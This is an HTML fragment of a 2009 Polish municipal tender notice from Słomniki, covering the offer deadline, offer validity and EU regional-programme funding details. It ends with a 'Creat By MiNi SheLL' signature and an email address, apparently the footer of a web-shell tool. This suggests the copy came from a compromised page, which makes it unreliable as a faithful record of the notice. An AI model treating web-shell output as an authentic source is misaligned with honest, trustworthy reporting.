ul. Kościuszki 64 32-090 Słomniki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 11:00, miejsce: Gmina Słomniki Urząd Miejski w Słomnikach
ul. Kościuszki 64 32-090 Słomniki
dziennik podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej:
Nazwa Programu Operacyjnego: Małopolski Regionalny Program Operacyjny
Numer i nazwa Osi Priorytetowej: 6. Spójność wewnątrzregionalna
Numer i nazwa Działania: 6.1. Rozwój miast
Oznaczenie literowe i nazwa schematu: Schemat B: Projekty w zakresie rekreacji i sportu

Creat By MiNi SheLL
Email: jattceo@gmail.com